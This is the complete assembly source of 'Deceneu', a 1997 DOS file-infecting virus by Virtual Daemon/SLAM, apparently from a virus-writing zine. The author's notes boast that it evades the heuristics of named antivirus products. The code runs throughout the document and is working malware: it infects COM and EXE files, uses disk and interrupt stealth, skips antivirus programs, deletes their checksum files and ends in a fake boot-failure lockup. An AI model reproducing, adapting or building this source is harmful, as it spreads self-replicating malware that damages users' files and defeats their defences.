Copy Link
Add to Bookmark
Report
SLAM4.046: Deceneu by Virtual Daemon/SLAM
____ _____ _____ _____ __ __ _____ __ __
| \ | ___| / \ | ___| | \| | | ___| | || |
| | | | ___| | <--< | ___| | | | ___| | `' |
|____/ |_____| \_____/ |_____| |__|\__| |_____| \____/
coded by
Virtual Daemon/SLAMFeatures:
- TSR/COM/EXE infector
- full stealth (on disk) in files
- uses UMB if available
- infect on 4b00h (execute file), 3eh (close file), 43h (get/set file attributes), 56h (rename/move file) and 41h (erase file)
- disinfect on 3dh (open), 6c00h (extended open) and 4b01h (load by debug)
- size stealth on 11h/12h (FCB find) and 4eh/4fh (DTA find)
- interrupt stealth on 3521h (get int 21h) and 2521h (set int 21h)
- disable stealth if ARJ, CHKDSK, LHA, PKZIP, RAR are running
- int 24h handler (no errors)
- restore original file time/date/attributes
- doesn't infect files on floppy disks
- doesn't infect files with today's date
- doesn't infect files beginning with:
- "AI" -> AidsTest
- "AV" -> AVP/AVPlite
- "CP" -> Central Point AntiVirus
- "DR" -> DRWeb
- "F-" -> F-Prot
- "FI" -> FindVirus
- "IM" -> Integrity Master
- "IV" -> Invircible
- "MS" -> Microsoft AntiVirus
- "NA" -> Norton AntiVirus
- "SC" -> McAfee SCAN (bleah)
- "TB" -> TBAV utilities
- "V-" -> V-Hunter
- "VI" -> Virstop
- "VS" -> Microsoft's VSAFE
- simple anti TBCLEAN code (use 386 instructions)
- pretty kewl payload
- no anti debugging shit (hell, I'm releasing the source, so why bother? ;)
I had phun with the following AV products (high heuristics enabled):
- no flags with TBSCAN v8.02
- no detection with DrWeb v3.21
- no detection with F-Prot v2.27/F-Prot v3.0
- no detection with Panda Profesional v5.0
- no detection with RAV (Romanian Anti Virus)
- no detection with Dr.Solomon's FindVirus v7.77
- no detection with AntiViral Toolkit Pro v3.0 Build 114
- no detection with SCAN, NAV, CPAV, MSAV, SUCKSAV, etc... :)
This is my attempt to code a TSR not encrypted, nor poly virus that can bypass AV heuristics. The virus is unscannable with the above AV products with heuristics activated. It was coded some months ago when I wanted to test how "good" are the AV heuristics. Well you can see the results for yourself...
Hell, if I coded this piece of shit... anyone can! So, it's time to put yer fat asses to work you AV yankers! ;) Yer earning way too much for your work!
Umm... besides tricking the AV heuristics, the virus is VERY lame. Umm, rip it off if you want to... I don't care! Just use it to learn something...
Best regards to: indianowl, pawk, tuir, unknown, mmir... the whole SLAM gang and to all my other friends.
Compile it with:
tasm deceneu.asm (4.0)
tlink /x deceneu.obj (6.0)
code
%out
%out Deceneu, Copyright (c) 1997 by Virtual Daemon [SLAM]
%out
virus_size equ (endheap-begin+15)/16
.286
.model tiny
.code
org 0
begin:
call getd ;get the delta offset in BP
delta:
db 66h,50h,66h,58h ;=push EAX/pop EAX - this is AntiTBCLEAN
push ds es
lea ax,[bp+isinst] ;this is anti F-Prot
call ax ;go and check if the virus is already resident
cmp byte ptr cs:[bp+arewein],0
je install ;we aint in memory
jmp already_there
install:
mov ax,0058h ;get memory allocation strategy
call _21h
push ax ;save current strategy
mov ax,0258h ;get umb link state
call _21h
push ax ;save current link state
mov ax,0158h ;set memory allocation strategy
mov bx,81h ;BX=81h best fit, try high then low memory
call _21h
jc umb_error
xor dx,dx
mov ax,0358h ;set umb link state
mov bx,1 ;add UMBs to DOS memory chain
call _21h
jc umb_error
mov al,48h ;alloc memory
mov bx,virus_size ;size in paras
call _21h
jc umb_error
xchg dx,ax ;get the segment address of allocated block
umb_error:
pop bx ;restore the umb link state
mov ax,0358h
call _21h
pop bx ;restore the memory allocation strategy
xor bh,bh
mov ax,0158h
call _21h
xchg dx,ax
or ax,ax ;check if the UMB operation was succesfull
jne mem_ok ;if not equal, then we're in UMB
no_umb:
mov ax,es
dec ax
mov ds,ax ;DS=MCB
mov bx,ds:[3] ;get the size
sub bx,virus_size+1 ;subtract our virus from it
mov al,4ah ;expand the memory block
call _21h
mov al,48h ;allocate memory
mov bx,virus_size ;size in paras
call _21h
mem_ok:
mov es,ax
dec ax
mov ds,ax ;DS=MCB
mov al,'Z' ;set as the last MCB
mov byte ptr ds:[0],al
mov ax,8 ;set owner as DOS
mov word ptr ds:[1],ax
push cs ;copy the virus in memory
pop ds
mov cx,(heap-begin)/2+1
mov si,bp
xor di,di
cld
rep movsw
mov ds,cx
mov ax,word ptr ds:[21h*4] ;get old int 21h vector (seg+ofs)
mov word ptr es:old_21h,ax
mov ax,word ptr ds:[21h*4+2]
mov word ptr es:old_21h+2,ax
push es
pop ds
lea dx,myint21h
mov bx,2125h ;set our new int 21h handler
push bx
pop ax
call _21h
mov ax,2f35h ;get old int 2fh vector
call _21h
mov word ptr old_2fh,bx
mov word ptr old_2fh+2,es
mov ax,2f25h ;set our new int 2fh handler
lea dx,myint2fh
call _21h
already_there:
pop es ds
cmp word ptr cs:[bp+_sp],0fffeh ;check if the file is COM or EXE
jne exe_exit ;at COM files, the SP is ALWAYS equal with FFFEh
com_exit:
lea si,[bp+offset jmp3] ;restore the original bytes in memory
mov di,200h ;antiheuristic
shr di,1
push di ;DI=100h
cld
movsb
movsw
retn ;pass control to original COM file
exe_exit:
mov ax,es
add ax,10h ;AX=PSP+10h
add word ptr cs:[bp+_cs],ax
xor ax,ax ;clear general registers
xor bx,bx
xor cx,cx
xor dx,dx
xor di,di
xor si,si
push cs:[bp+_cs] ;we'll jump to CS:IP
push cs:[bp+_ip]
xor bp,bp
retf ;pass control to original EXE file
_cs dw 0fff0h ;original CS:IP will point to an int 20h in PSP
_ip dw 0
_sp dw ? ;original Stack Pointer
myint2fh:
cmp dx,0ffffh
je maybe
_2fhret:
jmp cs:old_2fh ;return to original int 2fh
maybe:
pusha
push es cs
pop es ;ES=CS
lea di,command ;compare the command with our string
mov cx,4
cld
repe cmpsb
pop es
popa
jne _2fhret
cmp ax,0ae00h
jne payload
mov ax,0aeffh
iret
payload:
cmp ax,0ae01h
jne _2fhret
pusha
mov al,2ch ;check if it's after 18:00
call x_int21
cmp ch,18
jb nopayload
call screwit
nopayload:
xor al,al
mov ds:[si],al
popa
iret
command db 4,'SLAM'
screwit: ;here begins our little payload
push cs
pop ds
mov al,9 ;print the message
lea dx,text
call x_int21
readkey:
xor ax,ax ;wait for the Enter key
int 16h
cmp al,13
jne readkey
mov ax,6*256 ;clear the screen
mov bh,7
xor cx,cx
mov dx,6223
int 10h
xor dx,dx
mov ah,2
xor bh,bh
int 10h
xor al,al ;try to read the first sector of drive A:
xor dx,dx
mov cx,1
int 25h
pop dx
jmp screwit ;we'll do an infinte loop
text db 'DISK BOOT FAILURE, INSERT SYSTEM DISK AND PRESS ENTER',0dh,0ah,'$'
my_24h: ;new interrupt handler for INT 24h
mov al,3 ;execution failed
iret
myint21h:
cmp ax,'VD' ;residency check?
jne go_ahead ;nope... gotta be something else then
mov dx,'SL'
mov cx,'AM'
iret
go_ahead:
call check4arh ;check if there's any archivers running
xchg ah,al
cmp byte ptr cs:[nostealth],1 ;see if we can stealth our virus
je withoutstealth ;archiver alert => NO stealth...
cmp al,11h ;find first via FCB?
je fcbstealth
cmp al,12h ;find next via FCB?
je fcbstealth
cmp al,4eh ;find first via DTA?
je dtastealth
cmp al,4fh ;find next via DTA?
je dtastealth
cmp al,3dh ;open file?
je godisinfect
cmp ax,014bh ;load by debuggers?
je godisinfect
cmp ax,006ch ;extended open/create?
jne withoutstealth
jmp extdisinfect
withoutstealth:
cmp al,3eh ;close file?
jne exec
jmp close_infection
exec:
cmp ax,004bh ;execute file?
je goinfect
cmp al,56h ;rename/move?
je goinfect
cmp al,43h ;set/get file attributes?
je goinfect
cmp al,41h ;delete file?
je goinfect
cmp ax,2135h ;get int 21h vector?
je get21h
cmp ax,2125h ;set int 21h vector?
je set21h
restore_al:
xchg ah,al
exithandler:
db 0eah ;jump to original int 21h vector
old_21h dd ?
get21h:
mov es,word ptr cs:[old_21h+2] ;give the original interrupt
mov bx,word ptr cs:[old_21h] ;instead of our new one
iret
set21h:
mov word ptr cs:[old_21h],dx ;set virus as being on top
mov word ptr cs:[old_21h+2],ds
iret
fcbstealth:
jmp fcb_stealth
dtastealth:
jmp dta_stealth
goinfect:
jmp infect ;go and infect the file
godisinfect:
jmp disinfect ;go and disinfect the file
delete: ;delete some checksum files
push cs
pop ds
lea dx,avp_crc
call eraseshit
lea dx,tbav_crc
call eraseshit
lea dx,msav_crc
call eraseshit
lea dx,cpav_crc
call eraseshit
lea dx,chklst
call eraseshit
lea dx,invirc_crc
call eraseshit
ret
avp_crc db 'AVP.CRC',0
tbav_crc db 'ANTI-VIR.DAT',0
msav_crc db 'CHKLIST.MS',0
cpav_crc db 'SMARTCHK.CPS',0
chklst db 'CHKLIST.TAV',0
invirc_crc db 'IVB.NTZ',0
fcb_stealth:
call x_int21 ;fake a int 21h call
cmp al,0 ;AL=0 -> no errors (dir call was succesfull)
je stealth_ok
jmp stealth_skip ;if error, exit
stealth_ok:
pushf
pusha
push ds es
mov ah,51h ;get current PSP
call int21
mov es,bx
cmp bx,es:[16h] ;check if the PSP is ok
je no_err
jmp stealth_error
no_err:
mov bx,dx ;get offset to unopened FCB
mov al,[bx]
push ax ;AX=FFh -> extended FCB
mov ah,2fh ;get DTA area
call int21
pop ax
inc al
jne no_ext
add bx,7 ;if extended FCB add 7 bytes
no_ext:
cmp word ptr es:[bx+9],'XE' ;check if the file is EXE
je nextcheck
cmp word ptr es:[bx+9],'OC' ;check if the file is COM
jne stealth_error
nextcheck:
cmp byte ptr es:[bx+11],'E'
je filefound
cmp byte ptr es:[bx+11],'M'
jne stealth_error
filefound:
inc bx ;BX=BX+1
mov cx,1 ;mark as a FCB search (CX=1)
jmp finish_stealth
dta_stealth:
call x_int21 ;fake a int 21h call
jc stealth_skip ;CF set on error
pushf
pusha
push ds es
mov ah,2fh ;get DTA area
call int21
xor cx,cx ;mark as a DTA search (CX=0)
lea si,word ptr [bx+1eh]
namecheck:
cmp byte ptr es:[si],'.'
je dotfound
inc si
jmp short namecheck
dotfound:
cmp word ptr es:[si+1],'XE'
je firstfound
cmp word ptr es:[si+1],'OC'
jne stealth_error
firstfound:
cmp byte ptr es:[si+3],'E'
je finish_stealth
cmp byte ptr es:[si+3],'M'
jne stealth_error
finish_stealth:
mov ax,es:[bx+16h] ;get number of secs
and al,1fh ;test if infected
xor al,7
jne stealth_error
cmp cx,1 ;check if it's an 11h/12h call or an 4eh/4fh one
jne no_fcbstealth
add bx,2 ;adjust BX
no_fcbstealth:
cmp word ptr es:[bx+1ah],(heap-begin) ;check if the file is too small
jbe stealth_error
sub word ptr es:[bx+1ah],(heap-begin) ;substract the virus from file
sbb word ptr es:[bx+1ch],0
stealth_error:
pop es ds
popa
popf
stealth_skip:
retf 2
extdisinfect:
cmp dl,1 ;check if its a normal 6ch open call
je normalopen
jmp restore_al
normalopen:
mov dx,si ;put the file name from DS:SI into DS:DX
mov byte ptr cs:[extdisinf],1 ;mark as a extended open call
disinfect:
pusha
pushf
push ds es
call setnew24h ;set our 24h interrup to avoid errors
mov ax,0043h ;get file attributes
call x_int21
push cx dx ds ;save file name & attributes
mov ax,0143h ;set new attributes
xor cx,cx
call x_int21
mov ax,023dh ;open file for read/write
call x_int21
jnc nohandle_err ;if no error, continue
jmp restoreattr ;else restore attributes and return to int 21h
nohandle_err:
xchg bx,ax ;put the filehandle handle in BX
push bx
call getsft ;check the filename too see if it's COM or EXE
pop bx
jnc huray
jmp close_dis
huray:
push cs cs
pop ds es ;CS=DS=ES
mov ax,0057h ;AX=5700h - get file time/date
call x_int21
and cl,1fh ;test if infected
xor cl,7
je positive ;if infected with our virus, try to disinfect it
jmp close_dis
positive:
mov word ptr cs:[f_time],cx
mov word ptr cs:[f_date],dx
mov al,3fh ;AH=3fh - read from file
mov cx,1ch ;CX=1ch - read 28 bytes from header
lea dx,tempbuf ;store em into our temporary buffer
call x_int21
mov al,2 ;move to EOF
call movepointer
xchg dx,ax ;put filesize from DX:AX into AX:DX
mov cx,'ZM' ;check for EXE ('MZ' or 'ZM' signature)
cmp word ptr cs:[tempbuf],cx
je execheck
mov cx,'MZ'
cmp word ptr cs:[tempbuf],cx
je execheck
cmp byte ptr cs:[tempbuf],0e9h ;check if it is a JMP instruction
je comcheck
jmp close_dis
execheck:
cmp word ptr cs:[tempbuf+12h],'(:' ;check if infected by our virus
jne close_dis
jmp short we_are_in
comcheck:
mov cx,word ptr cs:[tempbuf+1] ;if the offset of the JMP=offset of our virus
add cx,(heap-begin)+3 ;then the file is infected
cmp dx,cx
jne close_dis
we_are_in:
mov cx,ax ;put the filesize from AX:DX into CX:DX
push dx ;save filesize
push cx
sub dx,(heap-buffer) ;go where the original header is saved
mov ax,0042h
call x_int21
mov al,3fh ;read the original bytes in memory
mov cx,1ch
lea dx,buffer
call x_int21
call movetoBOF ;move to beginning of file
mov al,40h ;write the original bytes to file
lea dx,buffer
mov cx,1ch
call x_int21
pop cx ;restore file size
pop dx
sub dx,(heap-begin) ;substract the length of our virus
mov ax,0042h
call x_int21
mov al,40h ;truncate the file
xor cx,cx
call x_int21
mov ax,0157h ;restore original time/date
mov cx,word ptr cs:[f_time]
mov dx,word ptr cs:[f_date]
and cl,1eh ;screw up seconds
call x_int21
close_dis:
mov al,3eh ;close the file
call x_int21
restoreattr:
mov ax,0143h ;restore attributes
pop ds dx cx ;restore file name & attributes
call x_int21
call delete
mov ax,2524h ;restore original int 24h vector
mov ds,word ptr cs:[old_24+2]
mov dx,word ptr cs:[old_24]
call int21
pop es ds
popf
popa
cmp byte ptr cs:[extdisinf],1 ;check if it was a extended call
jne quit
mov ax,006ch ;set ax to 6c00h
mov dx,1 ;set dx to 1
mov byte ptr cs:[extdisinf],0
quit:
jmp restore_al
infect:
pusha
pushf
push ds es
mov al,19h ;get default drive
call x_int21
cmp al,2 ;if we're on a floppy disk, then don't infect
jae corect
jmp _regrestore
corect:
push ds dx ;save file name
mov byte ptr cs:[closeinf],0
call setnew24h ;set new Int 24h vector
pop dx ds ;restore file name
mov ax,0043h ;save file name and file attributes
call x_int21
push ds dx cx
mov ax,0143h ;set new file attributes
xor cx,cx
call x_int21
mov ax,023dh ;open file for read/write
call x_int21
jnc get_time
jmp r_attr
get_time:
xchg bx,ax ;put the file handle in BX
push bx
call getsft
pop bx
jnc infect_close
oups:
jmp close_it
infect_close:
call checkdate
jc oups
mov ax,0057h ;get file time/date
call x_int21
and cl,1fh ;test if infected
xor cl,7
jne fux0red
jmp close_it
fux0red:
mov word ptr cs:[f_time],cx
mov word ptr cs:[f_date],dx
push cs cs
pop ds es ;CS=DS=ES
;read the original header (used when we're gonna disinfect the damn file! :)
mov al,3fh ;read and save the orginal header
mov cx,1ch
lea dx,tempbuf
call x_int21
lea si,tempbuf ;copy the header into our temporary buffer
lea di,buffer
mov cx,14 ;14*2=28=1Ch bytes
cld
rep movsw
mov al,2 ;go to EOF
call movepointer
mov cx,'ZM'
cmp word ptr tempbuf,cx ;check if the 1st 2 bytes are 'ZM' or 'MZ'
je exe_infect
mov cx,'MZ'
cmp word ptr tempbuf,cx
je exe_infect
com_infect:
cmp ax,65535-(endheap-begin) ;check if the file is too big
jae not_good
cmp ax,(endheap-begin) ;check if the file is too small
jbe not_good
mov al,2
call movepointer
mov cx,word ptr tempbuf+1 ;check if already infected
add cx,heap-begin+3
cmp ax,cx
je not_good
mov si,offset tempbuf
mov di,offset jmp3 ;prepare the JMP
cld
movsw
movsb
mov byte ptr [offset tempbuf],0e9h ;0e9h=JMP code
sub ax,3 ;AX=filesize-3 (the 1st JMP)
mov word ptr [offset tempbuf+1],ax ;store the offset
mov _sp,0fffeh
jmp write_virus
exe_infect:
cmp word ptr cs:[tempbuf+12h],'(:' ;check if the file is already infected
je not_good
cmp byte ptr cs:[tempbuf+18h],'@' ;check if the file is a Windoze one
je not_good
cmp word ptr cs:[tempbuf+1ah],0 ;check if the file has internal overlays
jne not_good
jmp looks_fine
not_good:
jmp close_it
looks_fine:
push ax dx ;save file size (DX:AX)
mov cx,word ptr cs:[tempbuf+4]
mov ax,200h
mul cx ;DX:AX contains the FileSize-LastPage
add ax,word ptr cs:[tempbuf+2]
adc dx,0
mov word ptr cs:[f_size],ax
mov word ptr cs:[f_size+2],dx ;DX:AX contains the filesize now
pop dx ax ;restore the FileSize found by LSEEK
cmp ax,word ptr cs:[f_size]
ja not_good ;check if the file REALLY doesn't have overlays
cmp dx,word ptr cs:[f_size+2]
ja not_good
mov cx,word ptr cs:[tempbuf+16h] ;save CS
mov _cs,cx
mov cx,word ptr cs:[tempbuf+14h] ;save IP
mov _ip,cx
mov cx,word ptr cs:[tempbuf+10h] ;save SP
mov _sp,cx
push ax dx ;save filesize
mov cx,10h ;divide by 16 (transform into paragraphs)
div cx ;AX=filesize in paragraphs
sub ax,word ptr cs:[tempbuf+8h] ;substract the size of the header
mov word ptr cs:[tempbuf+14h],dx ;adjust CS:IP to point to our virus
mov word ptr cs:[tempbuf+16h],ax
mov word ptr cs:[tempbuf+12h],'(:' ;mark as infected
pop dx ax ;restore filesize
add ax,(heap-begin)
adc dx,0
mov cx,200h ;recalculate filesize
div cx ;DX and AX contains the filesize+our virus
inc ax ;add one for remainder (last page)
mov word ptr cs:[tempbuf+2],dx ;store the new PartPag and PageCnt
mov word ptr cs:[tempbuf+4],ax
write_virus:
mov al,40h ;write the virus body to file
mov cx,heap-begin
lea dx,begin
call x_int21
call movetoBOF
mov al,40h ;write the modified bytes to beginning
mov cx,1ch
lea dx,tempbuf
call x_int21
mov ax,0157h ;restore the original time/date
mov cx,word ptr cs:[f_time]
mov dx,word ptr cs:[f_date]
and cl,-32 ;mark as infected (seconds number=14)
or cl,7
call x_int21
close_it:
cmp byte ptr cs:[closeinf],1 ;if it's a close infection, restore
je restore
mov al,3eh ;close the file
call x_int21
r_attr:
mov ax,0143h ;restore the file attributes
pop cx dx ds ;restore file name and file attributes
call x_int21
call delete
restore:
mov ax,2524h ;restore the original int 24h vector
mov ds,word ptr cs:[old_24+2]
mov dx,word ptr cs:[old_24]
call int21
_regrestore:
mov byte ptr cs:[closeinf],0
pop es ds
popf
popa
_quit:
jmp restore_al
close_infection:
cmp bx,5 ;check file handle
jb _quit ;special file handle? pheww... exit then!
pusha
pushf
push ds es
push bx ;save file handle
call setnew24h
call getsft ;get SFT and check for "unusual" files... ;)
pop bx ;restore file handle
jnc found
jmp restore
found:
mov byte ptr es:[di+2],2 ;mark as opened for R/W in SFT
call movetoBOF
mov byte ptr cs:[closeinf],1 ;mark as "close infection"
jmp infect_close
movetoBOF:
mov al,0
movepointer:
mov ah,42h ;set file pointer
xor cx,cx
xor dx,dx
call int21
ret
getsft:
mov ax,1120h ;get JOB file table entry
inc ah ;anti heuristic
int 2fh
jnc sftentry
jmp sfterror
sftentry:
mov bl,es:[di]
cmp bl,0ffh ;check if the handle is open
je sfterror
mov ax,1116h ;get address of SFT entry
inc ah ;anti heuristic
int 2fh
jc sfterror
mov ax,word ptr es:[di+28h]
or ax,2020h ;lowercase
cmp ax,'oc'
je sftnext
cmp ax,'xe'
jne sfterror
sftnext:
mov al,byte ptr es:[di+2Ah]
or al,20h ;lowercase
cmp al,'m'
je sftfound
cmp al,'e'
jne sfterror
sftfound:
mov ax,word ptr es:[di+20h]
or ax,2020h
cmp ax,'ia' ;check for AidsTest
je sfterror
cmp ax,'va' ;check for AVP/AVPlite
je sfterror
cmp ax,'pc' ;check for Central Point AntiVirus
je sfterror
cmp ax,'rd' ;check for DRWeb
je sfterror
cmp ax,'-f' ;check for F-Prot
je sfterror
cmp ax,'if' ;check for FindVirus
je sfterror
cmp ax,'mi' ;check for Integrity Master
je sfterror
cmp ax,'vi' ;check for Invircible
je sfterror
cmp ax,'sm' ;check for Microsoft AntiVirus
je sfterror
cmp ax,'an' ;check for Norton AntiVirus
je sfterror
cmp ax,'cs' ;check for McAfee SCAN
je sfterror
cmp ax,'bt' ;check for TBAV utilities
je sfterror
cmp ax,'-v' ;check for V-Hunter
je sfterror
cmp ax,'iv' ;check for Virstop
je sfterror
cmp ax,'sv' ;check for VSAFE
je sfterror
clc
ret
sfterror:
stc
ret
checkdate:
pusha
clc
mov al,2ah ;check if the file was created today
call x_int21
xchg cx,ax
sub ax,1980
shl ax,4
or al,dh
shl ax,5
or al,dl
push ax
mov ax,0057h
call x_int21
pop cx
cmp cx,dx
jne dinfect
stc
dinfect:
popa
ret
setnew24h:
pusha
push ds es
mov ax,3524h ;get Int 24h interrupt vector
call int21
mov word ptr cs:[old_24],bx
mov word ptr cs:[old_24+2],es
push cs
pop ds
mov ax,2524h ;set new Int 24h interrupt vector
lea dx,my_24h
call int21
pop es ds
popa
ret
eraseshit:
mov al,41h ;erase file
call x_int21
ret
disablestealth:
mov byte ptr cs:[nostealth],1
jmp short check4arhexit
check4arh:
mov byte ptr cs:[nostealth],0
pusha
push es
mov al,62h ;get PSP address
call x_int21
dec bx ;get MCB
mov es,bx
mov ax,word ptr es:[8] ;ax points to the filename
cmp ax,'RA' ;check for 'ARJ'
je disablestealth
cmp ax,'HC' ;check for 'CHKDSK'
je disablestealth
cmp ax,'HL' ;check for 'LHA'
je disablestealth
cmp ax,'KP' ;check for 'PKZIP'
je disablestealth
cmp ax,'AR' ;check for 'RAR'
je disablestealth
check4arhexit:
pop es
popa
ret
isinst:
mov byte ptr cs:[bp+arewein],0
mov ax,'VD' ;check if the virus is active in memory
int 21h
cmp dx,'SL'
jne no_inst
cmp cx,'AM'
jne no_inst
mov byte ptr cs:[bp+arewein],1
no_inst:
ret
_21h:
xchg ah,al
int 21h
ret
x_int21:
xchg ah,al
int21:
pushf
push cs
call exithandler ;call the old Int 21h vector
ret
getd:
mov si,sp
mov bp,word ptr ss:[si]
sub bp,offset delta ;get the delta offset in bp
ret
jmp3 db 0cdh,20h,0 ;original COM bytes (int 20h)
old_24 dd ?
buffer db 1ch dup (?)
signature db 'Deceneu coded by Virtual Daemon/SLAM'
old_2fh dd 0
heap:
nostealth db 1
f_time dw ?
f_date dw ?
f_size dd ?
extdisinf db 0
closeinf db 0
bufcheck dw 0
tempbuf db 1ch dup (?)
arewein db 0
endheap:
end begin
; end of phile
